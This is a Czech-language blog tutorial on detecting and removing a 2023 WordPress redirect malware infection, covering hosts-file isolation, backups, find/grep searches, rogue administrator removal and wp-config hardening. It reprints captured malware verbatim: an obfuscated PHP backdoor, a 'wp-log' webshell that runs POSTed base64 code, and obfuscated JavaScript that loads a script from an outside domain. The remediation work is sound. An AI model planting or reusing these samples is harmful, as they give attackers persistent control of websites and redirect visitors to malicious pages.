Fix Redirect WordPress Hack 2023 (Virus Redirect)

0

WordPress je to jednoznačně nejpoužívanější platforma CMS (Content Management System) jak pro blogy, tak pro začínající internetové obchody (s modulem WooCommerce), díky čemuž je nejvíce terčem počítačových útoků (hackování). Jedna z nejpoužívanějších hackerských operací má za cíl přesměrovat napadený web na jiné webové stránky. Redirect WordPress Hack 2023 je relativně nový malware, který má za následek přesměrování celého webu na spamové webové stránky nebo může infikovat počítače uživatelů.

Pokud se vaše stránky vyvíjely na WordPress je přesměrován na jiný web, pak je s největší pravděpodobností obětí již známého redirect hacku.

V tomto návodu najdete potřebné informace a užitečné tipy, jak devirovat web infikovaný přesměrováním WordPress Hack (Virus Redirect). Prostřednictvím komentářů můžete získat další informace nebo požádat o pomoc.

Detekce viru, který přesměrovává stránky WordPress

Náhlý a neopodstatněný pokles návštěvnosti webu, pokles počtu objednávek (v případě internetových obchodů) nebo příjmů z reklamy jsou prvními signály, že něco není v pořádku. Detekce"Redirect WordPress Hack 2023“ (Virus Redirect) lze také provést „vizuálně“, když otevřete webovou stránku a budete přesměrováni na jinou webovou stránku.

Ze zkušeností vyplývá, že většina webového malwaru je kompatibilní s internetovými prohlížeči: Chrome, Firefox, Edge, Opera. Pokud jste uživatelem počítače Mac, tyto viry nejsou v prohlížeči skutečně vidět Safari. Bezpečnostní systém od Safari tiše blokovat tyto škodlivé skripty.

Co dělat, pokud máte infikovaný web Redirect WordPress Hack

Doufám, že prvním krokem není panikařit nebo web smazat. Ani infikované nebo virové soubory by neměly být zpočátku mazány. Obsahují cenné informace, které vám mohou pomoci pochopit, kde došlo k narušení zabezpečení a co ovlivnilo virus. Modus operandi.

Zavřete web pro veřejnost.

Jak zavřete virový web pro návštěvníky? Nejjednodušší je použít správce DNS a odstranit IP pro "A" (název domény) nebo definovat neexistující IP. Návštěvníci webu tak budou před tímto chráněni redirect WordPress hack což je může zavést na webové stránky s viry nebo spamem.

Pokud použijete CloudFlare jako správce DNS se přihlásíte k účtu a odstraníte záznamy DNS "A“ pro název domény. Doména zasažená virem tak zůstane bez IP adresy a nebude již přístupná z internetu.

Zkopírujete IP webové stránky a "nasměrujete" ji tak, abyste k ní měli přístup pouze vy. Z vašeho počítače.

Jak změnit skutečnou IP webové stránky na počítačích Windows?

Tato metoda se často používá k blokování přístupu k určitým webovým stránkám úpravou souboru „hosts“.

1. Otevřeš Notepad nebo jiný textový editor (s právy administrator) a upravte soubor "hosts". Je umístěn v: 

C:\Windows\System32\drivers\etc\hosts

2. V souboru "hosts" přidejte "route" ke skutečné IP vaší webové stránky. IP odstraněna výše ze správce DNS. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Uložte soubor a přejděte na web v prohlížeči.

Pokud se web neotevře a v souboru „hosts“ jste neudělali nic špatného, ​​jedná se s největší pravděpodobností o mezipaměť DNS.

Vymazání mezipaměti DNS v operačním systému Windows, OTEVŘENO Command Prompt, kde spustíte příkaz: 

ipconfig /flushdns

Jak změnit skutečnou IP webové stránky na počítačích Mac / MacRezervovat?

Pro uživatele počítačů Mac je poněkud jednodušší změnit skutečnou IP webové stránky.

1. Otevřete nástroj Terminal.

2. Spusťte příkazový řádek (pro spuštění vyžaduje systémové heslo): 

sudo nano /etc/hosts

3. Stejné jako u počítačů Windows, přidejte skutečnou IP domény. 

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Uložte změny. Ctrl+X (y).

Poté, co jste „nasměrovali“, jste jedinou osobou, která má přístup k infikované webové stránce Redirect WordPress Hack.

Úplná záloha webu – soubory a databáze

I když je infikován „redirect WordPress hack“, doporučuje se provést obecnou zálohu celého webu. Soubory a databáze. Možná byste také mohli uložit místní kopii obou souborů public / public_html stejně jako databáze.

Identifikace infikovaných souborů a souborů modifikovaných Redirect WordPress Hack 2023

Hlavní cílové soubory WordPress existují index.php (v kořeni), header.php, index.php şi footer.php tématu WordPress aktiva. Ručně zkontrolujte tyto soubory a identifikujte škodlivý kód nebo malwarový skript.

V roce 2023 se objevil virus typu „Redirect WordPress Hack“vložit index.php kód formuláře:

(Nedoporučuji spouštět tyto kódy!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Dekódováno, tohle škodlivý skript je to v podstatě důsledek napadení webové stránky WordPress. Za malwarem nestojí skript, ale skript, který umožňuje přesměrovat infikovanou webovou stránku. Pokud dekódujeme výše uvedený skript, dostaneme: 

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Fix Redirect WordPress Hack 2023
Fix Redirect WordPress Hack 2023

Pro identifikaci všech souborů na serveru, které obsahují tento kód, je dobré mít přístup SSH na server, na kterém spustíte kontrolu souborů a správu příkazových řádků Linux.

Související: Jak zjistit, zda je váš blog infikován nebo ne, s pomocí Google Search , (WordPress Virus)

Níže jsou uvedeny dva příkazy, které jsou určitě užitečné k identifikaci nedávno upravených souborů a souborů, které obsahují určitý kód (řetězec).

Jak to vidíš Linux Změnily se soubory PHP za posledních 24 hodin nebo v jiném časovém rámci?

Objednat "find” se velmi jednoduše používá a umožňuje přizpůsobení nastavení časového období, cesty k vyhledávání a typu souborů. 

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

Ve výstupu obdržíte informace o datu a času změny souboru, oprávnění k zápisu / čtení / spouštění (chmod) a do které skupiny/uživatele patří.

Pokud chcete zkontrolovat před více dny, změňte hodnotu "-mtime -1“ nebo použijte „-mmin -360“ po dobu minut (6 hodin).

Jak hledat kód (řetězec) v souborech PHP, Java?

Příkazový řádek "najít", který vám umožní rychle najít všechny soubory PHP nebo Java, které obsahují určitý kód, je následující: 

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Příkaz vyhledá a zobrazí soubory .php şi .js obsahující "uJjBRODYsU".

Pomocí dvou výše uvedených příkazů velmi snadno zjistíte, které soubory byly v poslední době upraveny a které obsahují malware kód.

Odstraňuje škodlivý kód z upravených souborů, aniž by narušil správný kód. V mém scénáři byl malware umístěn před otevřením <head>.

Při provádění prvního příkazu "najít" je velmi možné objevit nové soubory na serveru, které nejsou vaše WordPress ani tam dát ty. Soubory patřící k typu viru Redirect WordPress Hack.

Ve scénáři, který jsem zkoumal, soubory formuláře „wp-log-nOXdgD.php". Jedná se o „spawn“ soubory, které také obsahují malwarový kód používaný virem k přesměrování. 

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Účel souborů typu "wp-log-*“ je šíření viru přesměrování na další webové stránky hostované na serveru. Jedná se o malwarový kód typu „webshell“ složený z a základní sekce (ve kterém jsou definovány některé šifrované proměnné) a o exekuční sekce prostřednictvím kterého se útočník pokouší načíst a spustit škodlivý kód v systému.

Pokud existuje proměnná POST pojmenovaný 'bh“ a jeho zašifrovanou hodnotu MD5 je rovný "8f1f964a4b4d8d1ac3f0386693d28d03“, pak se zdá, že skript zapisuje zašifrovaný obsah base64 další proměnné s názvem 'b3' v dočasném souboru a poté se pokusí tento dočasný soubor zahrnout.

Pokud existuje proměnná POST nebo GET pojmenovaný 'tick', skript odpoví hodnotou MD5 řetězce"885".

Chcete-li identifikovat všechny soubory na serveru, které obsahují tento kód, vyberte řetězec, který je společný, a poté spusťte příkaz „find“ (podobně jako výše). Smažte všechny soubory obsahující tento malwarový kód.

Bezpečnostní chyba zneužita Redirect WordPress Hack

S největší pravděpodobností tento virus přesměrování přichází přes zneužití administračního uživatele WordPress nebo identifikací a zranitelný plugin což umožňuje přidávat uživatele s oprávněními administrator.

Pro většinu webů postavených na platformě WordPress to je možné úpravy souborů motivů nebo pluginůz administračního rozhraní (Dashboard). Osoba se zlými úmysly tak může do souborů motivu přidat malwarový kód a vygenerovat skripty uvedené výše.

Příklad takového malwarového kódu je tento: 

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifikované v záhlaví motivu WordPress, ihned po otevření štítku <head>.

Je poměrně obtížné tento JavaScript dešifrovat, ale je zřejmé, že se dotazuje na jinou webovou adresu, odkud s největší pravděpodobností stahuje další skripty pro vytváření souborů "wp-log-*“, o kterém jsem mluvil výše.

Najděte a odstraňte tento kód ze všech souborů PHP postižený.

Pokud jsem mohl říct, tento kód byl ručně přidáno novým uživatelem s administrátorskými právy.

Chcete-li tedy zabránit přidávání malwaru z řídicího panelu, je nejlepší zakázat možnost úprav WordPress Motivy / pluginy z řídicího panelu.

Upravte soubor wp-config.php a přidejte řádky: 

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

Po provedení této změny žádný uživatel WordPress již nebudete moci upravovat soubory z řídicího panelu.

Zkontrolujte uživatele s rolí Administrator

Níže je uveden SQL dotaz, který můžete použít k vyhledání uživatelů s rolí administrator v platformě WordPress:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Tento dotaz vrátí všechny uživatele v tabulce wp_users kdo přidělil roli administrator. Dotaz se provádí také pro tabulku wp_usermeta hledat v meta 'wp_capabilities', který obsahuje informace o uživatelských rolích.

Další metodou je identifikovat je z: Dashboard → Users → All Users → Administrator. Existují však postupy, pomocí kterých lze uživatele na panelu Dashboard skrýt. Takže nejlepší způsob, jak vidět uživatele "Administrator"V WordPress je výše uvedený příkaz SQL.

V mém případě jsem v databázi identifikoval uživatele jménem "wp-import-user". Docela sugestivní.

WP Malware Bad User
WP Malware Bad User

Také zde můžete vidět datum a čas uživatele WordPress byl vytvořen. ID uživatele je také velmi důležité, protože prohledává protokoly serveru. Tímto způsobem můžete vidět veškerou aktivitu tohoto uživatele.

Smazat uživatele s rolí administrator což tedy neznáte změnit hesla všem administrativním uživatelům. Redaktor, autor, Administrator.

Změňte heslo uživatele databáze SQL dotčeného webu.

Po provedení těchto kroků lze web restartovat pro všechny uživatele.

Mějte však na paměti, že to, co jsem uvedl výše, je jedním z možná tisíců scénářů, ve kterých je web infikován Redirect WordPress Hack v roce 2023.

Pokud byl váš web infikován a potřebujete pomoc nebo máte nějaké dotazy, sekce komentářů je otevřená.

Věnovaný technologiím, s radostí píši na StealthSettings.com od roku 2006. Mám bohaté zkušenosti s operačními systémy: macOS, Windows a Linux, stejně jako s programovacími jazyky a platformami pro blogování (WordPress) a pro online obchody (WooCommerce, Magento, PrestaShop).

Návody napsané mnou.
AntiVirus a zabezpečení Linux Tech News Návody a IT novinky WordPress
Malware virus wordpress WordPress Hacks WordPress virus
jak na to » WordPress » Fix Redirect WordPress Hack 2023 (Virus Redirect)

Jak automaticky uzamknout počítač, když od něj odejdete

Jak odemknout Mac pomocí Apple Watch

Zanechat komentář

Stealth Settings

Windows

Windows 11

Windows 10

Windows 8 / 8.1

Windows 7

Windows průhled

Windows XP

Správce úloh

Jak

Microsoft 365 / Office

Microsoft 365 / Office

vynikat

Word

PowerPoint

Outlook

Office 365 Productivity

Linux & Web Software

Nginx

Apache HTTP Server

PHP

SQL/MySQL

CentOS

ubuntu

Webhosting

WordPress & WooCommerce

Security & Antivirus

Awareness

Antivirus & Security

Malware

Spyware

© 2024 Stealth Settings. IT návody a novinky.

Politika důvěrnosti | O souborech cookie | Kontakt | O nás